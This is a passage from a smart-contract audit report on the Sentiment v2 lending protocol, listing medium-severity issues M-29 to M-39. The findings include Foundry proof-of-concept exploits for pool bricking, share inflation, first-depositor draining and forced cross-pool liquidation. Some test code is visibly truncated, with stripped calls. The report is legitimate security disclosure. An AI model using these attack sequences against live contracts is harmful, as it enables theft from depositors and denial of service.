        address position
    ) internal view returns (uint256) {
        uint256 minReqAssetValue;

        ... SKIP!...

        uint256 debtPoolsLength = debtPools.length;
        uint256 positionAssetsLength = positionAssets.length;
        for (uint256 i; i < debtPoolsLength; ++i) {
            for (uint256 j; j < positionAssetsLength; ++j) {
                uint256 ltv = riskEngine.ltvFor(debtPools[i], positionAssets[j]);
                ... SKIP!...
@>              minReqAssetValue += debtValuleForPool[i].mulDiv(wt[j], ltv, Math.Rounding.Up);
        ... SKIP!...
        return minReqAssetValue;

Note from above, that a position is either healthy or unhealthy across all debtPools and assets held by the position. There is no allocation of collateral to a debt position with respect to it's risk parameters. This means that the risk settings of one pool can directly impact the ability to liquidate a position in another pool.

Also note, in the liquidation flow, liquidators are free to chose which assets they seize and which debt they repay, as long as the position returns to a healthy state after the liquidation. This means that debt from a pool may be repaid even though the position was within the risk parameters of that pool.

Base pool owners are able to set LTV for assets individually through a request / accept pattern. But as shown, LTVs set by base pools do not strictly impact the risk in their pool, but all pools for which a single position has debt in.

There is a timelock delay on proposed changes to LTV, and here is why this doesn't completely mitigates this issue:

  1. The issue doesn't not require a change in LTV in any pool for a pool to be exposed to the risk settings of another pool via a liquidated position (that is just the adversarial-pool attack path).
  2. There is no limit on how many different positions a pool will loan to at any given time (call this numPools). Each position a pool loans to can have debts in up to 4 other pools. So even though a TIMELOCK_DURATION of 24 hours is implemented, it may not be practical for pools to monitor the proposed LTV changes for up to numPools^4 (numPools is uncapped).
  3. An adversarial pool could propose an LTV setting, then all other impacted pools may notice this and respond by adjusting their own LTVs to ensure their totalBorrowAssets is minimally impacted, then the adverserial pool may not even accept the proposed setting. Even if the setting is accepted there will be a window between when the first pool is allowed to update the settings and when other pools are able to, in which liquidations can occur.


Code Snippet


Paste the below coded POC into LiquidateTest.t.sol.

Simply put, it shows a single debt position on a pool get liquidated when the collateral price did not change and the pool owner did not change LTV settings. The sole cause of the liquidation was another pool changing their LTV settings.

Step by step:

  1. user deposits into base fixedRatePool and linearRatePool which both accept asset1. Both pools accept asset2 as collateral.
    • fixedRatePool has an LTV for asset2 of 70% (ie. minReqCollateral = debt / .7)
    • linearRatePool has an LTV for asset2 of 70% (ie. minReqCollateral = debt / .7)
  2. user2 opens a position and deposits 3e18 asset2 as collateral
  3. user2 borrows from both pools and has a healthy position:
    • user2 borrows 1e18 from fixedRatePool and 1e18 from linearRatePool
    • minReqCollateral = (1e18 1e18 / 0.7e18) + (1e18 1e18 / 0.7e18) = 1.428571e18 + 1.428571e18 = 2.857142e18
  4. fixedRatePool decides to decrease the LTV setting for asset2 to 60%
  5. Position is no longer health because minReqCollateral = (1e18 1e18 / 0.6e18) + (1e18 1e18 / 0.7e18) = 1.666e18 + 1.428571e18 = 3.094571e18
  6. A liquidator, which could be controlled by the owner of fixedRatePool then liquidates the position which has become unhealthy by repaying the debt from linearRatePool, thus impacting the utilization and interest rate of linearRatePool, despite the collateral price not changing and the owner of linearRatePool not adjusting it's LTV settings.
    function test_AuditBasePoolsShareRisk() public {

        // Pool risk settings
        riskEngine.requestLtvUpdate(fixedRatePool, address(asset2), 0.7e18); 
        riskEngine.requestLtvUpdate(linearRatePool, address(asset2), 0.7e18); 
        vm.warp(block.timestamp +  24 * 60 * 60); // warp to satisfy timelock
        riskEngine.acceptLtvUpdate(fixedRatePool, address(asset2));
        riskEngine.acceptLtvUpdate(linearRatePool, address(asset2));

        // 1. user deposits into base fixedRatePool and linearRatePool which both accept asset1. Both pools accept asset2 as collateral.
        vm.startPrank(user);, 20e18);
        asset1.approve(address(pool), 20e18);
        pool.deposit(fixedRatePool, 10e18, user);
        pool.deposit(linearRatePool, 10e18, user);

        // 2. user2 opens a position and deposits 3e18 asset2 as collateral
        vm.startPrank(user2);, 3e18);
        asset2.approve(address(positionManager), 3e18); // 3e18 asset2

        Action[] memory actions = new Action[](5);
        (position, actions[0]) = newPosition(user2, bytes32(uint256(0x123456789)));
        actions[1] = deposit(address(asset2), 3e18);
        actions[2] = addToken(address(asset2));

        // 3. user2 borrows from both pools and has a healthy position:
        actions[3] = borrow(fixedRatePool, 1e18);
        actions[4] = borrow(linearRatePool, 1e18);
        positionManager.processBatch(position, actions);

        // 4. fixedRatePool decides to decrease the LTV setting for asset2 to 60%
        riskEngine.requestLtvUpdate(fixedRatePool, address(asset2), 0.6e18); 
        vm.warp(block.timestamp + 24 * 60 * 60); // warp to satisfy timelock
        riskEngine.acceptLtvUpdate(fixedRatePool, address(asset2));

        // 5. Position is no longer health because minReqCollateral = (1e18 * 1e18 / 0.6e18) + (1e18 * 1e18 / 0.7e18) = 1.666e18 + 1.428571e18 = 3.094571e18

        // 6. A liquidator, which could be controlled by the owner of fixedRatePool then liquidates the position which has become unhealthy by repaying the debt from linearRatePool, thus impacting the utilization and interest rate of linearRatePool, despite the collateral price not changing and the owner of linearRatePool not adjusting it's LTV settings.
        DebtData[] memory debts = new DebtData[](1);
        DebtData memory debtData = DebtData({ poolId: linearRatePool, amt: type(uint256).max });
        debts[0] = debtData;

        AssetData memory asset1Data = AssetData({ asset: address(asset2), amt: 1.25e18 });
        AssetData[] memory assets = new AssetData[](1);
        assets[0] = asset1Data;

        vm.startPrank(liquidator);, 2e18);
        asset1.approve(address(positionManager), 2e18);
        positionManager.liquidate(position, debts, assets);

Tool used

Manual Review


Issue M-30: Base pools can get bricked if depositors pull out


Found by

000000, A2-security, ThePharmacist


In case depositors pull their funds out of the pool, due to rounding, there can be TotalDepositAssets > 0 while TotalDepositShares == 0. This would completely brick the deposit function of the pool and the pool would not be functional anymore. This can lead to attackers being able to disable a pool since the start of it's initialization.

Root Cause

in withdraw:350, the asset to share conversion is rounded up. This can allow the subtraction in withdraw:364 to reduce the share amount to zero while assets can stay more than zero.

This state causes every convertToShares to lead to zero for deposit assets, hence, bricking the deposit function with the error Pool_ZeroSharesDeposit.

Internal pre-conditions

  1. No other depositors should be present in the pool
  2. At least one accrual should have happened so that totalDepositAssets > totalDepositShares

External pre-conditions


Attack Path

  1. An attacker sees a pool initialization in the mempool
  2. Attacker initializes the pool herself so that the other transaction from the victim fails. (in case it is trying to deposit right after initialization)
  3. The attacker deposits some amount in the pool right after initialization
  4. In the next block, attacker takes all the deposit assets out and leaves only 1 in
  5. Now the TotalDepositAssets == 1 && TotalDepositShares == 0 holds true
  6. The pool is bricked



The log outputs for the PoC below:

  Total Deposit Assets 0
  Total Deposit Shares 0
  Attacker borrows 0
  Total Deposit Assets 200000000000000000000
  Total Deposit Shares 200000000000000000000
  Attacker borrows 0
  Total Deposit Assets 200000000000000000000
  Total Deposit Shares 200000000000000000000
  Attacker borrows 10000000000000000000
  Total Deposit Assets 200000000000000000000
  Total Deposit Shares 200000000000000000000
  Attacker borrows 10000003992699064570
  Total Deposit Assets 200000003992699064570
  Total Deposit Shares 200000000000000000000
  Attacker borrows 0
  Total Deposit Assets 1
  Total Deposit Shares 0
  Attacker borrows 0

Which shows the final Total Deposit Assets 1 and Total Deposit Shares 0 which bricks the victim pool.

function testCanBrickPool() public {
        address attacker = makeAddr("Attacker");
        address victim = makeAddr("Victim");

        MockERC20 borrowAsset = asset1;
        MockERC20 collateralAsset = asset2;
        uint256 amountOfAsset = 1_000 ether;
        uint256 vicPoolId;
        address attPosition;
        bytes memory data;
        Action memory action;

        * =============================
        *           SETUP
        * =============================
            // == Minting assets to actors
  , amountOfAsset);
  , amountOfAsset);

  , amountOfAsset);
  , amountOfAsset);
            // == Finish minting assets

            // == Making the position
            bytes32 salt = bytes32(uint256(98));
            address owner = attacker;
            data = abi.encodePacked(owner, salt);
            (attPosition,) = protocol.portfolioLens().predictAddress(owner, salt);
            action = Action({ op: Operation.NewPosition, data: data });
            positionManager.process(attPosition, action);

            // positionManager.toggleKnownAsset(address(collateralAsset)); // Already a known asset
            // == Finish making the position

            // == Victim making the pool
            // // ==== Setting the rateModel
            address rateModel = address(new LinearRateModel(1e18, 2e18));
            bytes32 RATE_MODEL_KEY = 0xc6e8fa81936202e651519e9ac3074fa4a42c65daad3fded162373ba224d6ea96;
            registry.setRateModel(RATE_MODEL_KEY, rateModel);
            // // ==== Finished Setting the rate model
            vicPoolId = pool.initializePool(
                victim, // owner
                address(borrowAsset), // asset to use
                1e30, // pool cap
                RATE_MODEL_KEY // rate model key in registry
            // // ==== Setting the LTV
            riskEngine.requestLtvUpdate(vicPoolId, address(collateralAsset), 0.8e18); // Using the same asset to borrow one in this case
            riskEngine.acceptLtvUpdate(vicPoolId, address(collateralAsset));
            // // ==== Finish setting the LTv
            // == Finished making the pool

            // == Attacker setting up the position
            data = abi.encodePacked(address(collateralAsset));
            action = Action({ op: Operation.AddToken, data: data });
            collateralAsset.transfer(address(attPosition), amountOfAsset/2);
            // == Finish Attacker setting up the position

        * =============================
        *           EXPLOIT
        * =============================

        logPoolData(vicPoolId, attPosition);

        borrowAsset.approve(address(pool), amountOfAsset/5);
        pool.deposit(vicPoolId, amountOfAsset/5, attacker);

        logPoolData(vicPoolId, attPosition);

        data = abi.encodePacked(vicPoolId, amountOfAsset/100);
        action = Action({ op: Operation.Borrow, data: data });
        borrowAsset.transfer(attPosition, amountOfAsset/50);

        logPoolData(vicPoolId, attPosition);

        vm.warp(block.timestamp + 12);

        logPoolData(vicPoolId, attPosition);

        data = abi.encodePacked(vicPoolId, type(uint256).max);
        action = Action({ op: Operation.Repay, data: data });

        logPoolData(vicPoolId, attPosition);

        (,,,,,,,,,uint256 totalDepositAssets,) = pool.poolDataFor(vicPoolId);
        pool.withdraw(vicPoolId, totalDepositAssets - 1, attacker, attacker); // 1 asset remaining with 0 shares, amountOfAsset = 1_000 ether

        logPoolData(vicPoolId, attPosition);

        borrowAsset.approve(address(pool), amountOfAsset/5);
        vm.expectRevert(); // pool is bricked!
        pool.deposit(vicPoolId, amountOfAsset/5, attacker);
    function logPoolData(uint256 poolId, address attacker) view public {
        (,,,,,,,,,uint256 totalDepositAssets, uint256 totalDepositShares) = pool.poolDataFor(poolId);
        console2.log("Total Deposit Assets", totalDepositAssets);
        console2.log("Total Deposit Shares", totalDepositShares);
        console2.log("Attacker borrows", pool.getBorrowsOf(poolId, attacker));


The protocol should check and only allow state transitions that make assets or shares 0 only if the other one is also 0.

Issue M-31: Share inflation on base pools can cause heavy losses to users


Found by

HHK, Obsidian, ThePharmacist, Tomas0707, smbv-1923, vatsal


Users can deposit and borrow from pools in Sentiment v2 which calculates each user's balance through an Asset and Share system. By it's nature, Assets are supposed to always grow (in case there are no bad debts), and therefore are larger in value than shares. However, malicious users can heavily inflate each share, and can cause miscalculations due to rounding errors. This would effect pools with less underlying decimal asset in a way that 1- The fee paid to the pool can br bricked easily 2- the users that deposit can lose money due to loss of precision.

Root Cause

Internal pre-conditions


External pre-conditions

1- since the inflation happens through accruals in each block, the attacker should not be interrupted during the process. In case of interruptions, attacker can start to work on a new pool.

Attack Path

The goal of the Attacker is to inflate each share and map each 1 share to a much higher amount of Asset. Here, we consider that the attacker is not going to be interrupted during the process, and also consider minDebt == 0. 1- The attacker deposits 1 asset into the protocol, bringing totalDepositAssets and totalDepositShares both to 1. 2- The attacker borrows the 1 asset from the protocol, bringing totalBorrowAssets and totalBorrowShares both to 1, also setting the utilization to 100 percent. 3- attacker starts accruing with each block, after the first accrual, Pool:407 adds to the Assets, inflating them in the process. feeShares is usually zero due to rounding down and small amounts in the process. 4- After the first accrual, totalDepositAssets and totalBorrowAssets are set to 2, while the shares remain in the previous value. 5- Attacker can continue and do this for a day, after (24*3600)/12 = 7200 times, can bring asset/share to 7201. 6- After the second day and 14400 times of accrual, bringing asset/share ratio to 14400. (Attacker can get achieve bigger numbers if they continue doing this) 7- At this point, every deposit or borrow from users would be rounded down/up by 14400. A victim can deposit 14400 * 2 - 1 assets and would only receive 1 share, basically sharing 14400 - 1 with the rest of the pool. 8 - This would especially effect the pools with less decimal values such as USDC and USDT.



The output of the test is:

  One day of constant accrual
  Total Borrow Assets:  7201
  Total Borrow Shares:  1
  Total Deposit Assets:  7201
  Total Deposit Shares:  1
  Two days of constant accrual
  Total Borrow Assets:  14401
  Total Borrow Shares:  1
  Total Deposit Assets:  14401
  Total Deposit Shares:  1
  Total Borrow Assets:  14401
  Total Borrow Shares:  1
  Total Deposit Assets:  43202
  Total Deposit Shares:  2


   function testInflateShares() public {
        address attacker = makeAddr("Attacker");
        address victim = makeAddr("Victim");
        address liquidator = makeAddr("Liquidator");

        riskEngine.setOracle(address(asset1), address(asset3Oracle)); // 1:1 with Eth
        riskEngine.setOracle(address(asset2), address(asset3Oracle)); // 1:1 with Eth

        MockERC20 borrowAsset = asset1; 
        MockERC20 collateralAsset = asset2;
        uint256 amountOfAsset = 1_000 ether;
        uint256 vicPoolId;
        address attPosition;
        bytes memory data;
        Action memory action;

        * =============================
        *           SETUP
        * =============================
            // == Minting assets to actors
  , amountOfAsset);
  , amountOfAsset);

  , amountOfAsset);
  , amountOfAsset);

  , amountOfAsset);
            // == Finish minting assets

            // == Making the position
            bytes32 salt = bytes32(uint256(98));
            address owner = attacker;
            data = abi.encodePacked(owner, salt);
            (attPosition,) = protocol.portfolioLens().predictAddress(owner, salt);
            action = Action({ op: Operation.NewPosition, data: data });
            positionManager.process(attPosition, action);

            // positionManager.toggleKnownAsset(address(collateralAsset)); // Already a known asset
            // == Finish making the position

            // == victim making the pool
            // // ==== Setting the rateModel
            address rateModel = address(new LinearRateModel(1e18, 2e18));
            bytes32 RATE_MODEL_KEY = 0xc6e8fa81936202e651519e9ac3074fa4a42c65daad3fded162373ba224d6ea96;
            registry.setRateModel(RATE_MODEL_KEY, rateModel);
            // // ==== Finished Setting the rate model
            vicPoolId = pool.initializePool(
                victim, // owner
                address(borrowAsset), // asset to use
                1e30, // pool cap
                RATE_MODEL_KEY // rate model key in registry
            // // ==== Setting the LTV
            riskEngine.requestLtvUpdate(vicPoolId, address(collateralAsset), 0.95e18); // Using the same asset to borrow one in this case
            riskEngine.acceptLtvUpdate(vicPoolId, address(collateralAsset));
            // // ==== Finish setting the LTv
            // == Finished making the pool

            // == Attacker setting up the position
            data = abi.encodePacked(address(collateralAsset));
            action = Action({ op: Operation.AddToken, data: data });
            collateralAsset.transfer(address(attPosition), amountOfAsset/2);
            // == Finish Attacker setting up the position

        * =============================
        *           EXPLOIT
        * =============================

        logPoolData(vicPoolId, attPosition);

        borrowAsset.approve(address(pool), amountOfAsset/5);
        pool.deposit(vicPoolId, 1, attacker);

        logPoolData(vicPoolId, attPosition);

        data = abi.encodePacked(vicPoolId, uint256(1));
        action = Action({ op: Operation.Borrow, data: data });
        borrowAsset.transfer(attPosition, amountOfAsset/50);

        for(uint i = 1; i <= 7200; i++){
            vm.warp(block.timestamp + 12);
        console2.log("One day of constant accrual");

        for(uint i = 1; i <= 7200; i++){
            vm.warp(block.timestamp + 12);
        console2.log("Two days of constant accrual");

        (,,,,,,,,, uint256 tDAssets,) = pool.poolDataFor(vicPoolId);
        borrowAsset.approve(address(pool), type(uint256).max);
        collateralAsset.approve(address(pool), type(uint256).max);
        pool.deposit(vicPoolId, tDAssets * 2 - 1, victim);


    function logPool(uint256 poolId) view public {
        (,,,,,,,uint256 tBAssets, uint256 tBShares, uint256 tDAssets, uint256 tDShares) = pool.poolDataFor(poolId);
        console2.log("Total Borrow Assets: ", tBAssets);
        console2.log("Total Borrow Shares: ", tBShares);
        console2.log("Total Deposit Assets: ", tDAssets);
        console2.log("Total Deposit Shares: ", tDShares);


Issue M-32: Faulty Fee Validation in SuperPool::requestFeeUpdate() Function Leads to Update Lockout


Found by

0xAristos, 0xc0ffEE, Naresh, Rea, ThePharmacist, Yuriisereda, arcaneagent1001, parsely, serial-coder, theweb3mechanic


The SuperPool::requestFeeUpdate() function is responsible for proposing new fee updates in the SuperPool contract, has a validation issue. The function incorrectly validates the current state variable fee instead of the new _fee parameter. This flawed logic causes the function to revert when the current fee exceeds 1e18, regardless of the _fee value. As a result, if the fee is ever set to a value greater than 1e18, no further fee updates can be proposed, leading to potential disruptions in the contract’s operations.

Vulnerability Detail

The SuperPool::requestFeeUpdate() is used to propose a new fee update for the SuperPool. the current implementation of the requestFeeUpdate() function only checks the state variable fee and not the new parameter _fee. This check only considers the current state variable fee, not the _fee parameter. This means if the state variable fee is greater than 1e18, the function will revert regardless of the value of _fee.

    function requestFeeUpdate(uint256 _fee) external onlyOwner {
@>     if (fee > 1e18) revert SuperPool_FeeTooHigh();
        pendingFeeUpdate = PendingFeeUpdate({ fee: _fee, validAfter: block.timestamp + TIMELOCK_DURATION });
        emit SuperPoolFeeUpdateRequested(_fee);

Since the requestFeeUpdate() function only considers the current state variable fee, once it’s set to a value greater than 1e18, no new updates can be proposed. This means the contract will never allow a fee update to be requested, potentially breaking functionality that depends on the ability to update the fee.

POC Extended from SuperPool.t.sol ```solidity function testCannot_Change_Fee() public { uint256 fee = 0.01 ether; SuperPool superpool = new SuperPool(address(pool), address(asset1), feeTo, fee, 1_000_000 ether, "test", "test"); // Update the fee to greater than 1e18 superpool.requestFeeUpdate(1e19); vm.warp(block.timestamp + superpool.TIMELOCK_DURATION() + 2); superpool.acceptFeeUpdate(); // Reverts once it is set to a value greater than 1e18, and no new updates can be proposed vm.expectRevert(SuperPool.SuperPool_FeeTooHigh.selector); superpool.requestFeeUpdate(0.01 ether); } ``` Run the following command to execute the POC: `forge test --match-test testCannot_Change_Fee`


The inability to update the fee due to the incorrect validation in requestFeeUpdate() could lead to a breakdown in the contract’s intended operations, making the contract non-functional or less adaptable to future needs.

Code Snippet

Tool used

Manual Review


Correct the validation in the requestFeeUpdate() function to check the _fee parameter:

    function requestFeeUpdate(uint256 _fee) external onlyOwner {
--      if (fee > 1e18) revert SuperPool_FeeTooHigh();
++      if (_fee > 1e18) revert SuperPool_FeeTooHigh();
        pendingFeeUpdate = PendingFeeUpdate({ fee: _fee, validAfter: block.timestamp + TIMELOCK_DURATION });
        emit SuperPoolFeeUpdateRequested(_fee);

Issue M-33: Liquidator can revert changes made during RiskEngine::setRiskModule() to use a higher liquidation discount.


Found by

phoenixv110, sl1


Liquidator can rollback changes made in RiskEngine during the call to setRiskModule() function to use an old liquidation discount if it's higher than the new one.

Vulnerability Detail

Position can be liquidated through invoking liquidate() function of the PositionManager. PositionManager.sol#L430-L435

function liquidate(
    address position,
    DebtData[] calldata debtData,
    AssetData[] calldata assetData
) external nonReentrant {
    riskEngine.validateLiquidation(position, debtData, assetData);

As can be seen, validateLiquidation() is invoked on the RiskEngine, which calls validateLiquidation() on the underlying RiskModule set in the RiskEngine. RiskEngine.sol#L136-L142

function validateLiquidation(
    address position,
    DebtData[] calldata debtData,
    AssetData[] calldata assetData
) external view {
    riskModule.validateLiquidation(position, debtData, assetData);

RiskModule ensures that the amount of assets seized does not exceed the maximum allowed amount determined by the RiskModule's liquidation discount. The higher the liquidation discount the more assets a liquidator can seize. RiskModule.sol#L111-L120

function validateLiquidation(
    address position,
    DebtData[] calldata debtData,
    AssetData[] calldata assetData
) external view {
    // position must breach risk thresholds before liquidation
    if (isPositionHealthy(position))
        revert RiskModule_LiquidateHealthyPosition(position);
    _validateSeizedAssetValue(  <<@

There exist two ways in the RiskEngine to change the underlying RiskModule and subsequently the liquidation discount:

  1. RiskModule can be changed in Registry and RiskEngine::updateFromRegistry() can be invoked to update the state of the RiskEngine.
  2. The owner of the RiskEnginge can call setRiskModule() to update RiskEngine's underlying RiskModule without updating the value in the registry.


function setRiskModule(address _riskModule) external onlyOwner {
    riskModule = RiskModule(_riskModule);
    emit RiskModuleSet(_riskModule);

However, if the owner wishes to change the RiskModule only for a specific RiskEngine, without updating the value in the registry, those changes can be easily reverted by any of the users. This can be done because updateFromRegistry() function of the RiskEngine is not restricted and when calling it the RiskModule will be set to an old value stored in the registry. RiskEngine.sol#L114-L120

function updateFromRegistry() external {
    pool = Pool(REGISTRY.addressFor(SENTIMENT_POOL_KEY));
    riskModule = RiskModule(REGISTRY.addressFor(SENTIMENT_RISK_MODULE_KEY));
    emit PoolSet(address(pool));
    emit RiskModuleSet(address(riskModule));

Imagine a scenario where the owner updates the RiskModule in the RiskEngine by calling setRiskModule() and changes the liquidation discount from 20% to 10%. Bob wishes to liquidate a debt worth 100 ETH and he is allowed to seize 100 / (100% - 10%) = 111 ETH. RiskModule.sol#L156

uint256 maxSeizedAssetValue = debtRepaidValue.mulDiv(1e18, (1e18 - discount));

Before calling liquidate() Bob calls RiskEnginge::updateFromRegistry(), which sets the RiskModule to the one stored in the registry with a liquidation discount of 20%. Because of that Bob now is allowed to seize 100 / (100% - 20%) = 125 ETH.

The same issue is present in the PositionManager, where any user can easily revert changes made during a call to setBeacon().


A malicious user can easily revert changes made by the owner and seize more assets than allowed.

Code Snippet

Tool used

Manual Review


Restrict the updateFromRegistry() functions both in PositionManager and RiskEngine, so an owner will have an ability to selectively update positionBeacon and riskModule variables respectively without having to change their values in the registry.

Issue M-34: RedstoneOracle priceTimestamp can be acurately determined , eliminating the need for a -3 mins worst case scenario


Found by



RedstoneOracle sets the priceTimestamp of a price feed update to block.timestamp - 3 mins. Assuming the worst case, priceTimestamp is 3 mins behind the actual timestamp of price update ,this 3 min lag is significant enough to dos the oracle when the price feed is not yet stale.

Especially when it is possible to retrieve the actual timestamp by overriding the validateTimestamp function.

Root Cause

In RedstoneOracle::updatePrice it is assumed that the price timestamp of the price feed cannot be retrieved:

 function updatePrice() external {
        // values[0] -> price of ASSET/USD
        // values[1] -> price of ETH/USD
        // values are scaled to 8 decimals
        uint256[] memory values = getOracleNumericValuesFromTxMsg(dataFeedIds);

        assetUsdPrice = values[0];
        ethUsdPrice = values[1];

        // RedstoneDefaultLibs.sol enforces that prices are not older than 3 mins. since it is not
        // possible to retrieve timestamps for individual prices being passed, we consider the worst
        // case and assume both prices are 3 mins old 
    ->  priceTimestamp = block.timestamp - THREE_MINUTES;

However this is not correct as we see in the getOracleNumericValuesFromTxMsg function and from the redstone docs:

  function getOracleNumericValuesFromTxMsg(bytes32[] memory dataFeedIds)
    returns (uint256[] memory)
    (uint256[] memory values, uint256 timestamp) = _securelyExtractOracleValuesAndTimestampFromTxMsg(dataFeedIds);
->  validateTimestamp(timestamp);
    return values;

   * @dev This function may be overridden by the child consumer contract.
   * It should validate the timestamp against the current time (block.timestamp)
   * It should revert with a helpful message if the timestamp is not valid
   * @param receivedTimestampMilliseconds Timestamp extracted from calldata
  function validateTimestamp(uint256 receivedTimestampMilliseconds) public view virtual {

The validateTimestamp function can be overridden. It's possible to retrieve the actual timestamp by overriding the validateTimestamp function and prevent any possible oracle DOS due to the time lag.

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response


Possible Oracle DOS due to lagging priceTimestamp


No response


Override validateTimestamp to retrieve the actual timestamp, as an example:

function validateTimestamp(uint256 timestamp) public view override {
  priceTimestamp = timestamp;


Issue M-35: The Rounding Done in Protocol's Favor Can Be Weaponized to Drain the Protocol


Found by



Empty pools' assets have been drained by the first depositor via inflating share prices.

Vulnerability Detail

 function testfirstdepositor() external {
    uint assets = 1000;
    vm.assume(assets > 0);
    vm.startPrank(user);, 1000e18);
    asset1.approve(address(pool), assets);

    pool.deposit(linearRatePool, 1000, user);
    assertEq(pool.getAssetsOf(linearRatePool, user), assets);
    assertEq(pool.balanceOf(user, linearRatePool), assets); // Shares equal 1:1 at first

    pool.borrow(linearRatePool, user, assets);
    vm.warp(block.timestamp + 10);
    vm.roll(block.number + 1 );,1001);
    pool.repay(linearRatePool, user, assets + 1);

    pool.withdraw(linearRatePool, 999 , user, user);, assets);
    asset1.approve(address(pool), 1000e18);

    uint256 n = 60;
    for(uint8 i = 0; i < n; i++){
        uint256 amount = i ** 2 + 1;
        pool.deposit(linearRatePool, amount , user);

        pool.withdraw(linearRatePool, 1 ,user,user);
        (,,,,,,,,,uint256 totalDepositAssets,uint256 totalDepositShares) = pool.poolDataFor(linearRatePool);
        require (totalDepositShares == 1, "should be one ");



The first depositor loses their funds as the attacker manipulates the share price to drain the pool's assets.

Code Snippet


Implement virtual shares or another mechanism to prevent rounding errors and price manipulation, especially when the pool is empty or has a very low total supply.

Issue M-36: In SuperPool, an attacker can move assets to a specific base pool


Found by



In SuperPool, the design supply to pools and withdraw from pools in queue will allow an attacker to move assets to a specific base pool.

Root Cause

The design supply to pools and withdraw from pools in queue

Internal pre-conditions

Let's call a base pool that an attacker want to move assets is X.

  1. Every base pool before X in depositQueue have SuperPool#poolCapFor[poolId] != type(uint256).max or Pool#poolDataFor[poolId].poolCap != type(uint256).max. The meaning of this pre-condition is there is way to deposit to X.
  2. There is exist a base pool before X in withdrawQueue that the SuperPool has assets in.

External pre-conditions

No response

Attack Path

There is a SuperPool that has:

This SuperPool is satisfied the internal pre-conditions. The base pool A represents for base pools that have SuperPool#poolCapFor[poolId] != type(uint256).max. The base pool B represents for base pools that have Pool#poolDataFor[poolId].poolCap != type(uint256).max. The goal of this attack is to move assets from A, B to X.

An attacker performs the attack in one transaction:

  1. Call to SuperPool#deposit(50, attacker). New state:
    • Pool#getTotalAssets(A) = 100
    • Pool#getAssetsOf(A, address(SuperPool)) = 100
  2. Call to Pool#deposit(B, 50, attacker). New state:
    • Pool#getTotalAssets(B) = 100
  3. Call to SuperPool#deposit(100, attacker). The SuperPool will deposit to X because SuperPool#poolCapFor[A], Pool#poolDataFor[B].poolCap are reached. New state:
    • Pool#getTotalAssets(X) = 100
    • Pool#getAssetsOf(X, address(SuperPool)) = 100
  4. Call to SuperPool#withdraw(100, attacker, attacker). New state:
    • Pool#getTotalAssets(A) = 0, Pool#getTotalAssets(B) = 0, Pool#getTotalAssets(X) = 100
    • Pool#getAssetsOf(A, address(SuperPool)) = 0, Pool#getAssetsOf(B, address(SuperPool)) = 0, Pool#getAssetsOf(X, address(SuperPool)) = 100
  5. Call to Pool#withdraw(B, 50, attacker). The attacker retrieves the funds deposited in step 2.

The attacker moved all assets to X. By doing this attack in one transaction, the attacker can flash-loan 150 tokens at the start of the attack for step 1 and 2, and then returns 150 tokens back at the end of the attack. Note that, the attacker does not hold any shares of SuperPool or Pool at the end of the attack. Meaning the cost this attack is only gas fee and flash-loan fee.


By moving assets to a specific base pool, an attacker can cause the following larger impacts:


No response


Add a two-step SuperPool#deposit/mint. First the users stage their deposit/mint. After a short timelock (E.g: 10 seconds), the users can finalize their deposit/mint. This will prevent the attack that uses flash-loan, but if the attacker has enough liquidity, then this attack still can happen.

Issue M-37: User can revert the positionBeacon value set by the ADMIN.


Found by

0xRstStn, Tendency, dhank


User can revert the positionBeacon value set by the ADMIN.

Vulnerability Detail

Using the setBeacon() , owner can change the value of positionBeacon to a new Address.

At the same time we have updateRegistry() which is a public function where the positionBeacon is set from the values of Registr contract.

function updateFromRegistry() public {
    pool = Pool(registry.addressFor(SENTIMENT_POOL_KEY));
    riskEngine = RiskEngine(registry.addressFor(SENTIMENT_RISK_ENGINE_KEY));
    positionBeacon = registry.addressFor(SENTIMENT_POSITION_BEACON_KEY);


Any User can revert the positionBeacon value set by the ADMIN.

Code Snippet

Tool used

Manual Review


positionBeacon update can be omiited from the updateRegistry.

Issue M-38: Security considerations of ERC6909 are not complied, thus an operator can steal funds


Found by



The protocol's pools are strictly compilant with ERC6909, which introduces the operator model. An operator is an account which is granted permission to transfer assets on behalf of the owner.

Also according to ERC6909 specification security considerations:

  1. The first consideration is consistent with all delegated permission models. Any account with operator permissions may transfer any amount of any token id on behalf of the owner until the operator permission is revoked
  2. The second consideration is unique to systems with both delegated permission models. In accordance with the `transferFrom`In accordance with the transferFrom method method, spenders with operator permission are not subject to allowance restrictions, spenders with infinite approvals SHOULD NOT have their allowance deducted on delegated transfers

However these security considerations are not taken of concern. This allows an operator to transfer all the available token balance of the owner to himself. And since for this contest, it's confirmed that only the owners of pools, super pools and position manager are considered as TRUSTED, the operator role is not an owner i consider this scenario likely to happen.

Vulnerability Detail

The problem lies in the Pool::withdraw() function:

function withdraw(uint256 poolId, uint256 assets, address receiver, address owner) public returns (uint256 shares) {
        if (msg.sender != owner && !isOperator[owner][msg.sender]) {
            uint256 allowed = allowance[owner][msg.sender][poolId];
            if (allowed != type(uint256).max) allowance[owner][msg.sender][poolId] = allowed - shares;

@>      IERC20(pool.asset).safeTransfer(receiver, assets);

As can be seen the caller can specify any address as the receiver.


Code Snippet

Tool used

Manual Review


Restrict the operator to be able to transfer to himself:

if (receiver == msg.sender && msg.sender != owner) revert("Operator cannot transfer to themselves");

But since he can choose any address, this exploit is not fully mitigated, consider if having an operator for the pools is in need.

Issue M-39: Rounding Error in Calculating newBorrowAssets during borrow/repayment


Found by

0xAlix2, KupiaSec


During the borrow/repayment operation in the pool, a rounding error arises when calculating newBorrowAssets, causing it to mismatch with the amount returned by getBorrowsOf, which I believe should align.

Vulnerability Detail

newBorrowAssets is meant to indicate the entire debt associated with a position, capturing the total amount of assets required to fully repay the debt obligation. I believe it should match the value given by getBorrowsOf, assuming that a repayment could occur immediately without any interest having accrued. Nevertheless, due to differences in the rounding directions used in these calculations, inconsistencies can occur.

As a consequence, even a small discrepancy might lead to newBorrowAssets falling below minDebt, which in turn can trigger the transaction to revert with the Pool_DebtTooLow error.

In borrow function, it used Math.Rounding.Down:

    function borrow(uint256 poolId, address position, uint256 amt) external returns (uint256 borrowShares) {
        uint256 newBorrowAssets = _convertToAssets(
            borrowSharesOf[poolId][position] + borrowShares,
            pool.totalBorrowAssets + amt,
            pool.totalBorrowShares + borrowShares,
>           Math.Rounding.Down
        if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
            revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);

In getBorrowsOf function, it used Math.Rounding.Up:

    function getBorrowsOf(uint256 poolId, address position) public view returns (uint256) {
        PoolData storage pool = poolDataFor[poolId];
